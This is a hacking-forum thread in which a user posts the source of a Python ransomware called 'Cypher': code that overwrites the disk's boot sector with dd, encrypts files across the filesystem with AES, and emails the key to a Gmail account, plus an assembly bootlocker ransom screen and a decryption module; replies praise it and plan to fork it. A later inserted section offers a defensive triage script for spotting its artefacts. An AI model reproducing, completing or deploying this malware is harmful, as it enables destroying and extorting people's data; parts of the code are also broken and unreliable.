Python based Ransomware. filter_list
Python based Ransomware. #1
Ethics of authoring malware aside, I think it is an interesting subject. As such, I have a project in development that is basically ransomware. Now, I have never written one of these before, so some improvements may be needed.

I decided to call my malware Cypher.

Cypher is a proof-of-concept ransomware which uses the PyCrypto module and uses Gmail (currently) as a sort of command and control server. It is a work in progress as of yet, and I will be releasing updates periodically depending on the amount of time I have to work on the project. The general idea is that the personal files get encrypted and the boot sector gets overwritten with a custom bootloader. As of yet I am looking into writing the bootlocker directly to disk, since at the moment I am just calling `dd` from within the script.

Code:
# Cypher is a work in progress, as such this is an Alpha release of the encryption
# module, for reporting bugs feel free to open an issue or should you wish to
# collaborate on this, pull requests are welcomed as well.

import os
import sys
import random
import struct
import smtplib
import string
import datetime
import time

import getpass as gp

from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool


# Function to generate our client ID
def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))


ID = gen_client_ID(12)
key = RSA.generate(2048)
exKey = RSA.exportKey('PEM')

# Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker.
if sys.platform == 'linux2' and gp.getuser() == 'root':
    try:
        os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass    
else:            
    try:
        os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass



def send_ID_Key():
    ts = datetime.datetime.now()
    SERVER = "smtp.gmail.com"         
    PORT = 587                         
    USER= "address@gmail.com"        # Specify Username Here
    PASS= "prettyflypassword"        # Specify Password Here
    FROM = USER
    TO = ["address@gmail.com"]         
    SUBJECT = "Ransomware data: "+str(ts)
    MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
    message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
    try:              
        server = smtplib.SMTP()
        server.connect(SERVER, PORT)
        server.starttls()
        server.login(USER, PASS)
        server.sendmail(FROM, TO, message)
        server.quit()
    except Exception as e:
        # print e
        pass
    


def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):

    if not out_filename:
        out_filename = in_filename + '.crypt'

    iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as infile:
        with open(out_filename, 'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(iv)

            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += ' ' * (16 - len(chunk) % 16)

                outfile.write(encryptor.encrypt(chunk))
                
                

def single_arg_encrypt_file(in_filename):
    encrypt_file(key, in_filename)

def select_files():
    
    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
           ".mov", ".gif", ".txt", ".py", ".pyc", ".jar"]
          
    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(tuple(ext)):
                files_to_enc.push(os.path.join(root, file))

    # Parallelize execution of encryption function over four subprocesses
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)
                

def note():
    
    readme = """
    
    .d8888b.                    888                      
    d88P  Y88b                   888                      
    888    888                   888                      
    888        888  888 88888b.  88888b.   .d88b.  888d888
    888        888  888 888 "88b 888 "88b d8P  Y8b 888P"  
    888    888 888  888 888  888 888  888 88888888 888    
    Y88b  d88P Y88b 888 888 d88P 888  888 Y8b.     888    
    "Y8888P"   "Y88888 88888P"  888  888  "Y8888  888    
                    888 888                                
             Y8b d88P 888                                
             "Y88P"  888    
    
    
    
    Hello, unfortunately all your personal files have been encrypted with millitary grade encryption and will be impossible
    to retrieve without aquiring the encryption key and decrypting binary.
    As of yet these are not available to you since the Cypher ransomware is still under construction.
    We thank you for your patience.

    Have a nice day,

    The Cypher Project."""     
    
    # Windows variant
    # outdir = os.getenv('USERNAME') + "\\Desktop"
    
    outdir = os.getenv('HOME') + "/Desktop/"
    outfile = outdir + "README"
    
    handler = open(outputfile, 'w')
    handler.write(outfile, ID)
    handler.close()
    
if __name__=="__main__":
    gen_client_ID()
    send_ID_Key()
    
    try:
        select_files()
        note()
    except Exception as e:
        pass

Bootlocker source in ASM.

Code:
[BITS 16]
[ORG 0x7C00]
MOV SI, Msg
CALL OutStr
JMP $
OutChar:
MOV AH, 0x0E
MOV BH, 0x00
MOV BL, 0x07
INT 0x10
RET
OutStr:
next_char:
MOV AL, [SI]
INC SI
OR AL, AL
JZ exit_function
CALL OutChar
JMP next_char
exit_function:
RET
Msg db 0xA, 0xD, 0xA, 0xD
   db '########################################################', 0xA, 0xD
   db '#   Your harddrive is encrypted with military grade    #', 0xA, 0xD
   db '#   encryption, you wont get your files back, since    #', 0xA, 0xD
   db '#  the Cypher ransomware is still under construction   #', 0xA, 0xD
   db '                                              ', 0xA, 0xD
   db '########################################################', 0xA, 0xD, 0xA, 0xD
   db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD
   db 'Have a nice day,', 0xA, 0xD
   db '     The Cypher Project', 0
TIMES 510 - ($ - $$) db 0
DW 0xAA55


The purpose of this thread would be to discuss ideas, better implementations and think about general improvements. This is a project intended for experimental and educational purposes. As such, I would advise against deploying this malware in an active engagement. Thank you for your understanding.

The project's github page can be found here.


RE: Python based Ransomware. #2
This was a pretty cool read-through. I lost sight of python a while back and forgot how powerful of a language it really is. I need to get back into it again.

[+] 1 user Likes BreShiE's post

RE: Python based Ransomware. #3
I've never thought of using email as a CI, nice thinking. I might fork this and mess around with it when I have some time on my hands.


RE: Python based Ransomware. #4
Thank you for sharing this, I am currently learning python and this could be fun to mess around with.

RE: Python based Ransomware. #5
Sorry for my absence, I forgot I had a Sinister.ly account, lol. Anyway, now that I am here again, I bring updates to this project in the form of bug fixes and the decryption module.

Code:
import os
import sys
import struct

from base64 import b64decode
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool

# Read in and decode keyfile
with open('privkey', 'r') as keyfile:
    keyData = keyfile.read().replace('\n', '')

keyDER = b64decode(keyData)    
key = RSA.importKey(keyDER)


def decrypt_file(key, in_filename, out_filename=None, chunksize=24*1024):

    # Split .crypt extension to restore file format
    if not out_filename:
        out_filename = os.path.splitext(in_filename)[0]

    with open(in_filename, 'rb') as infile:
        origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
        iv = infile.read(16)
        decryptor = AES.new(key, AES.MODE_CBC, iv)

        with open(out_filename, 'wb') as outfile:
            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                outfile.write(decryptor.decrypt(chunk))
        
        # Truncate file to original size
            outfile.truncate(origsize)


def single_arg_decrypt_file(in_filename):
    decrypt_file(key, in_filename)


def select_files():
    # Files to be decrypted are identified by .crypt extension
    ext = ".crypt"
          
    files_to_dec = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(str(ext)):
                files_to_dec.push(os.path.join(root, file))
    
    # Parralelize execution of decrypting function over four sub processes
    pool = Pool(processes=4)
    pool.map(single_arg_decrypt_file, files_to_dec)


if __name__=="__main__":
    select_files()

[+] 2 users Like VectorSEC's post
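Added triage example for responders, not code from the thread or from the Cypher project. It recognises the two artefacts described in post #1 and relied on by the decryption module in post #5: the `.crypt` container (8-byte little-endian original size, 16-byte IV, then an AES-CBC body space-padded to a multiple of 16) and the 512-byte bootlocker (boot signature 0xAA55 at offset 510, note text inside). Because the encryptor pads with spaces rather than PKCS#7 and its chunk size is itself a multiple of 16, a genuine container's body length is always exactly ceil(original_size / 16) * 16, which is a cheap consistency check for spotting files truncated by an interrupted run. All sample inputs are constructed inside the script (the `build_*` helpers); the opcode bytes in the sample boot sector are a hypothetical stand-in, not the assembled `boot.bin`.

```python
# Added triage example; not code from the thread or the Cypher project.
# It recognises the two artefacts the posts describe so a responder can
# confirm a sample before touching the disk:
#   1. the .crypt container written by encrypt_file() and read by decrypt_file()
#   2. the 512-byte bootlocker assembled from the ASM listing
# Sample inputs are constructed here (build_* helpers), not taken from a real case.
import os
import struct
import tempfile

CRYPT_EXT = ".crypt"
HEADER_LEN = struct.calcsize("<Q") + 16   # 8-byte original size + 16-byte IV
BOOT_SIGNATURE = b"\x55\xAA"             # DW 0xAA55 at offset 510, little-endian
NOTE_MARKER = b"Cypher ransomware"       # string present in the bootlocker's Msg


def parse_crypt_header(blob):
    """Return (original_size, iv, body_length) if blob has the container layout
    used by the thread's encrypt_file(), else None.

    Layout: struct.pack('<Q', filesize) | 16-byte IV | AES-CBC body.
    The body is space-padded to a multiple of 16 (not PKCS#7), and the chunk
    size is itself a multiple of 16, so the body length is always exactly
    ceil(original_size / 16) * 16. Anything else is truncated or not this format.
    """
    if len(blob) < HEADER_LEN:
        return None
    (original_size,) = struct.unpack("<Q", blob[:8])
    iv = blob[8:HEADER_LEN]
    body_len = len(blob) - HEADER_LEN
    if body_len != ((original_size + 15) // 16) * 16:
        return None
    return original_size, iv, body_len


def is_cypher_bootlocker(sector):
    """True for a 512-byte MBR image carrying the boot signature and the note text."""
    return (len(sector) == 512
            and sector[510:512] == BOOT_SIGNATURE
            and NOTE_MARKER in sector)


def triage_tree(root):
    """Walk root and classify every *.crypt file as 'crypt' (header consistent
    with the container layout) or 'malformed' (e.g. truncated by a killed
    process). Returns {path: classification}."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(CRYPT_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                blob = fh.read()
            findings[path] = "crypt" if parse_crypt_header(blob) is not None else "malformed"
    return findings


# --- constructed samples (shape only; the body is zero bytes, not ciphertext) ---

def build_sample_container(original_size, iv=b"\x00" * 16):
    """Constructed blob with the same header and padded length as encrypt_file() output."""
    body = b"\x00" * (((original_size + 15) // 16) * 16)
    return struct.pack("<Q", original_size) + iv + body


def build_sample_bootsector():
    """Constructed 512-byte sector: a few opcode bytes (hypothetical stand-in for
    the MOV SI/CALL prologue), the note string, zero fill, then 0xAA55."""
    body = b"\xbe\x00\x7c" + b"#  the Cypher ransomware is still under construction   #"
    return body.ljust(510, b"\x00") + BOOT_SIGNATURE


def demo():
    """Write one intact and one truncated sample into a scratch directory,
    triage it, and return {basename: classification}."""
    scratch = tempfile.mkdtemp(prefix="cypher-triage-")
    with open(os.path.join(scratch, "photo.jpg.crypt"), "wb") as fh:
        fh.write(build_sample_container(1000))
    with open(os.path.join(scratch, "notes.txt.crypt"), "wb") as fh:
        fh.write(build_sample_container(1000)[:-5])      # truncated write
    return {os.path.basename(p): v for p, v in triage_tree(scratch).items()}


if __name__ == "__main__":
    print(demo())
    print("bootlocker:", is_cypher_bootlocker(build_sample_bootsector()))
```

Run it directly to see the classification of the two constructed files and the boot sector verdict; point `triage_tree()` at a mounted image and `is_cypher_bootlocker()` at the first 512 bytes of the disk (`dd if=/dev/sdX bs=512 count=1` read into bytes) for a real case. The check is header-level only: it does not decrypt anything, and a malformed file is worth noting because the truncating `decrypt_file()` would silently produce garbage for it. Note also that post #1 mails the exported key with Gmail credentials hard-coded in the script, so in this design the mailbox, not the binary, is where a responder would look for the key.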

RE: Python based Ransomware. #6
Currently experimenting with Python. Might play around with this for educational purposes.


RE: Python based Ransomware. #7
Thank you, I certainly will look into it!


RE: Python based Ransomware. #8
Might be interesting to add FTP functionality.


RE: Python based Ransomware. #9
Despite my heavy disgust for ransomware (I like coding malware, but ransom is the kind of hacking that's amateur and not elegant enough), the code is really elegant. I would have used more one-liner hacks, but it's really nice!
Also keep in mind that the cypher name is already taken, but nice work
(This post was last modified: 02-01-2017, 01:38 PM by silur.)
